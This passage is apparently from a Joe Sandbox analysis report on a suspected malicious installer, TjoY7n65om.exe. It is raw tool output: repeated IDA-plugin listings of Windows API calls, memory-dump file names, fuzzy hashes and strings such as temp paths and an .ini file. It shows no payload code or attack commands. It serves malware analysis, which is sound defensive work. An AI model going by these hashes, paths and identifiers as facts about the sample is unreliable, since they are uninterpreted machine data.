                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                          • String ID: 1C@$: Completed$N
                                                                                                                          • API String ID: 3103080414-516214725
                                                                                                                          • Opcode ID: 5f098caee5535ae1e7b5b61cf078335e238ade03d1551e6bec200614ec9300dd
                                                                                                                          • Instruction ID: 9026ebbe03bb6d5dcd5a9bde039089338ffc2a6a86adc40c9d49ddbc6b033b78
                                                                                                                          • Opcode Fuzzy Hash: 5f098caee5535ae1e7b5b61cf078335e238ade03d1551e6bec200614ec9300dd
                                                                                                                          • Instruction Fuzzy Hash: D161A3B1A00209BFDB109F60DD45EAA7B79FB94305F00853AF705B62E0D779A952CF68
                                                                                                                          APIs
                                                                                                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                          • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                          • DrawTextW.USER32(00000000,00429200,000000FF,00000010,00000820), ref: 00401156
                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                          • String ID: F
                                                                                                                          • API String ID: 941294808-1304234792
                                                                                                                          • Opcode ID: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
                                                                                                                          • Instruction ID: 53e7ac87f6412b54f62e8112edad18e9e8f6d31619aee210d26213a62ff7d26c
                                                                                                                          • Opcode Fuzzy Hash: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
                                                                                                                          • Instruction Fuzzy Hash: 88418A71800209AFCF058FA5DE459AF7BB9FF44310F00842AF991AA1A0C738D955DFA4
                                                                                                                          APIs
                                                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,0040606B,?,?), ref: 00405F0B
                                                                                                                          • GetShortPathNameW.KERNEL32(?,00426D88,00000400), ref: 00405F14
                                                                                                                            • Part of subcall function 00405CDF: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CEF
                                                                                                                            • Part of subcall function 00405CDF: lstrlenA.KERNEL32(00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D21
                                                                                                                          • GetShortPathNameW.KERNEL32(?,00427588,00000400), ref: 00405F31
                                                                                                                          • wsprintfA.USER32 ref: 00405F4F
                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,00427588,C0000000,00000004,00427588,?,?,?,?,?), ref: 00405F8A
                                                                                                                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F99
                                                                                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD1
                                                                                                                          • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,00426988,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 00406027
                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00406038
                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040603F
                                                                                                                            • Part of subcall function 00405D7A: GetFileAttributesW.KERNELBASE(00438800,00402F1D,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D7E
                                                                                                                            • Part of subcall function 00405D7A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DA0
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                          • String ID: %ls=%ls$[Rename]
                                                                                                                          • API String ID: 2171350718-461813615
                                                                                                                          • Opcode ID: 9fe56ee9aebbe4e8a82578a5ab6143b45b94006cc37f6f31d23d913fa1877209
                                                                                                                          • Instruction ID: cb5629e100ec4411e7767e9ff1715c79388972a83a2f5f57e92a2ee479f5e204
                                                                                                                          • Opcode Fuzzy Hash: 9fe56ee9aebbe4e8a82578a5ab6143b45b94006cc37f6f31d23d913fa1877209
                                                                                                                          • Instruction Fuzzy Hash: 92313571240B19BBD230AB659D48F6B3A5CEF45744F15003BF906F72D2EA7C98118ABD
                                                                                                                          APIs
                                                                                                                          • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\TjoY7n65om.exe",00403334,C:\Users\user\AppData\Local\Temp\,774D3420,004035A3,?,00000006,00000008,0000000A), ref: 0040657B
                                                                                                                          • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040658A
                                                                                                                          • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\TjoY7n65om.exe",00403334,C:\Users\user\AppData\Local\Temp\,774D3420,004035A3,?,00000006,00000008,0000000A), ref: 0040658F
                                                                                                                          • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\TjoY7n65om.exe",00403334,C:\Users\user\AppData\Local\Temp\,774D3420,004035A3,?,00000006,00000008,0000000A), ref: 004065A2
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Char$Next$Prev
                                                                                                                          • String ID: "C:\Users\user\Desktop\TjoY7n65om.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                          • API String ID: 589700163-2244654023
                                                                                                                          • Opcode ID: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                                                                          • Instruction ID: 9d8e3f8f3784457604ea521ff392e3c8e3efc90107dbe880bee10e7696629eb6
                                                                                                                          • Opcode Fuzzy Hash: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                                                                          • Instruction Fuzzy Hash: AB11B655800616A5DB303B18BC44A7762F8AF54B60F92403FED89736C5F77C5C9286BD
                                                                                                                          APIs
                                                                                                                          • GetWindowLongW.USER32(?,000000EB), ref: 0040427F
                                                                                                                          • GetSysColor.USER32(00000000), ref: 004042BD
                                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 004042C9
                                                                                                                          • SetBkMode.GDI32(?,?), ref: 004042D5
                                                                                                                          • GetSysColor.USER32(?), ref: 004042E8
                                                                                                                          • SetBkColor.GDI32(?,?), ref: 004042F8
                                                                                                                          • DeleteObject.GDI32(?), ref: 00404312
                                                                                                                          • CreateBrushIndirect.GDI32(?), ref: 0040431C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2320649405-0
                                                                                                                          • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                                          • Instruction ID: 0f30b588a8d7f9bbf1461c481b53b443173021fc121084549064eaca6d41b1d8
                                                                                                                          • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                                          • Instruction Fuzzy Hash: CD2174716007059FCB319F68DE48A5BBBF8AF81711B048A3EFD96A26E0D734D944CB54
                                                                                                                          APIs
                                                                                                                          • ReadFile.KERNEL32(?,?,?,?), ref: 004026B6
                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
                                                                                                                          • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A
                                                                                                                            • Part of subcall function 00405E5B: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405E71
                                                                                                                          • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                          • String ID: 9
                                                                                                                          • API String ID: 163830602-2366072709
                                                                                                                          • Opcode ID: c1a2398a3cf68ffccba9bba39206efc2048042628f08e4a72376123c44d13fd0
                                                                                                                          • Instruction ID: 3d8386ac743f87b5a59d0c6af2c48158715b6bf8f4fdb2ba716f86882e7a1e00
                                                                                                                          • Opcode Fuzzy Hash: c1a2398a3cf68ffccba9bba39206efc2048042628f08e4a72376123c44d13fd0
                                                                                                                          • Instruction Fuzzy Hash: 46510A74D10219AEDF219F95DA88AAEB779FF04304F50443BE901F72D1D7B49982CB58
                                                                                                                          APIs
                                                                                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404BD1
                                                                                                                          • GetMessagePos.USER32 ref: 00404BD9
                                                                                                                          • ScreenToClient.USER32(?,?), ref: 00404BF3
                                                                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404C05
                                                                                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C2B
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Message$Send$ClientScreen
                                                                                                                          • String ID: f
                                                                                                                          • API String ID: 41195575-1993550816
                                                                                                                          • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                                          • Instruction ID: ae0188e128420319643ad50796f74bd77cac7447aa244d18a8bf097087cf05ab
                                                                                                                          • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                                          • Instruction Fuzzy Hash: 9C019E7190021CBAEB00DB94DD81BFFBBBCAF95711F10412BBB10B61D0C7B499418BA4
                                                                                                                          APIs
                                                                                                                          • GetDC.USER32(?), ref: 00401DBC
                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                                                                                          • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                                                                                          • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                                                                                          • CreateFontIndirectW.GDI32(0040CDA8), ref: 00401E3E
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                          • String ID: Calibri
                                                                                                                          • API String ID: 3808545654-1409258342
                                                                                                                          • Opcode ID: 1acdf138dc74c3f4cbb002bee862ac271e9050b380170d6a443b5acebdec0054
                                                                                                                          • Instruction ID: af8ff02f4bd052a881cb17574bfe8b5bbda2d2cac472569fbfdf17f98f113d3f
                                                                                                                          • Opcode Fuzzy Hash: 1acdf138dc74c3f4cbb002bee862ac271e9050b380170d6a443b5acebdec0054
                                                                                                                          • Instruction Fuzzy Hash: 39017571948240EFE7406BB4AF8ABD97FB49F95301F10457EE241B71E2CA7804459F2D
                                                                                                                          APIs
                                                                                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
                                                                                                                          • MulDiv.KERNEL32(000C98C2,00000064,000C98C6), ref: 00402E3C
                                                                                                                          • wsprintfW.USER32 ref: 00402E4C
                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 00402E5C
                                                                                                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E6E
                                                                                                                          Strings
                                                                                                                          • verifying installer: %d%%, xrefs: 00402E46
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                          • String ID: verifying installer: %d%%
                                                                                                                          • API String ID: 1451636040-82062127
                                                                                                                          • Opcode ID: 66d2592fca5784473147c8150b099ced33c2aea089bdfd78c1b867d04e1d1f0a
                                                                                                                          • Instruction ID: 4bcbb139cde21edcf0ff7b700e9789e452b98774f77cb7efe3bd4e4e9d403b43
                                                                                                                          • Opcode Fuzzy Hash: 66d2592fca5784473147c8150b099ced33c2aea089bdfd78c1b867d04e1d1f0a
                                                                                                                          • Instruction Fuzzy Hash: C701F47154020CABDF209F60DE49FAA3B69EB44705F008439FA45B51E0DBB995558F98
                                                                                                                          APIs
                                                                                                                          • lstrlenW.KERNEL32(004236E8,004236E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B49
                                                                                                                          • wsprintfW.USER32 ref: 00404B52
                                                                                                                          • SetDlgItemTextW.USER32(?,004236E8), ref: 00404B65
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ItemTextlstrlenwsprintf
                                                                                                                          • String ID: %u.%u%s%s$6B
                                                                                                                          • API String ID: 3540041739-3884863406
                                                                                                                          • Opcode ID: 45cae9be8c13eedb47404a8b3ee91442d476cfb775bff5969470e661b9022d33
                                                                                                                          • Instruction ID: 22ef8b20c3cb34d9681d0f1950c5ee3b7e818b69147609aa9b6e87f13a537159
                                                                                                                          • Opcode Fuzzy Hash: 45cae9be8c13eedb47404a8b3ee91442d476cfb775bff5969470e661b9022d33
                                                                                                                          • Instruction Fuzzy Hash: 18110833A041283BDB10A96D9C46F9F329CDB85374F250237FA26F21D1DA79DC2182E8
                                                                                                                          APIs
                                                                                                                          • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\slgtsbog\oblating.ini,000000FF,nerveklinikkernes,00000400,?,?,00000021), ref: 004025E8
                                                                                                                          • lstrlenA.KERNEL32(nerveklinikkernes,?,?,C:\Users\user\AppData\Local\Temp\slgtsbog\oblating.ini,000000FF,nerveklinikkernes,00000400,?,?,00000021), ref: 004025F3
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ByteCharMultiWidelstrlen
                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\slgtsbog\oblating.ini$nerveklinikkernes
                                                                                                                          • API String ID: 3109718747-1405770578
                                                                                                                          • Opcode ID: 117bdbcdfb20abded91d9bb1efc4a5bce906789812cb2159414a34963df76135
                                                                                                                          • Instruction ID: 3dcd1766983357fa33eb9a2b17af164457a9c6038e68ae70dd04151361e6fae4
                                                                                                                          • Opcode Fuzzy Hash: 117bdbcdfb20abded91d9bb1efc4a5bce906789812cb2159414a34963df76135
                                                                                                                          • Instruction Fuzzy Hash: D7110872A00300BEDB146BB1CE89A9F76649F54389F20843BF502F61D1DAFC89425B6E
                                                                                                                          APIs
                                                                                                                          • CreateDirectoryW.KERNEL32(?,?,00000000), ref: 004057FE
                                                                                                                          • GetLastError.KERNEL32 ref: 00405812
                                                                                                                          • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405827
                                                                                                                          • GetLastError.KERNEL32 ref: 00405831
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
